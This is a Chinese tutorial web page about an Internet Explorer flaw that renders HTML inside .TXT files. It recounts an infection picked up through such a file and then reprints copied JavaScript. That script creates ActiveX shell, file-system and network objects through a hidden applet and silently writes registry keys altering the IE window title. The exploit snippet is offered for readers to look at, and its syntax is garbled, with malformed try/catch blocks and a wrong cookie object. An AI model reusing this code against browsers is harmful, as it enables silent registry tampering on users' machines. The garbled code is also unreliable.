电脑基础知识教程-IE浏览器文本

电脑基础知识教程-IE浏览器文本IE能将*.TXT中的HTML语句读出已经是众所周知的了,这个漏洞的危害性及普遍性甚至说利用性还是不

欢迎大家来到IT世界,在知识的湖畔探索吧!

IE能将*.TXT中的HTML语句读出已经是众所周知的了,这个漏洞的危害性及普遍性甚至说利用性还是不高的.

大家对HTML的语句可能造成的危害都有一定的共识,但对TXT呢,我想防患意识就不高了,上次我碰到REDCRACK,他和我开玩笑的时候,就让我去一个地方,后台开了个TXT文档,当时我没觉得不妥,事后一查,好家伙HAPPY TIME等大家伙都来了.于是我想,这个结合MIME头的运用, 就可以有下载的权限了吧,现在的很多html语法都可以改注册表,推而广之,TXT的威力也是一样的,但隐蔽性绝对更高.

下面是抄来的一段代码,大家可以看看

<SCRIPT Language=”javascript” type=”text/javascript”> //这里开始调用一个JS脚本

<!–

document.write(“<APPLETHEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>”);

function f()

{ try }

{ //ActiveX initialization

a1=document.applets[0];

a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”);

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID(“{0D43FE01-F093-11CF-8940-00A0C9054228}”);

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID(“{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}”);

a1.createInstance();

Net = a1.GetObject(); }

{ try }

if (documents.cookie.indexOf(“Chg”) == -1)

{ Shl.RegWrite(“HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle”,”I’amChinese!!”);Shl.RegWrite (“HKCU\\Software

\\Microsoft\\Internet Explorer\\Main\Window Title”, “I’am Chinese!”); //这里把IE title修改成了”I’am Chinese!”

var expdate = new Date((new Date()).getTime() + (1));

documents.cookie=”Chg=general;expires=”+ expdate.toGMTString() + “; path=/;” }

{catch(e) }

{catch(e) }

{ function init() }

{ setTimeout(“f()”, 1000); }

init();

// –>

</SCRIPT>

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://itzsg.com/30099.html

(0)

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

联系我们YX

mu99908888

在线咨询: 微信交谈

邮件:itzsgw@126.com

工作时间:时刻准备着!

关注微信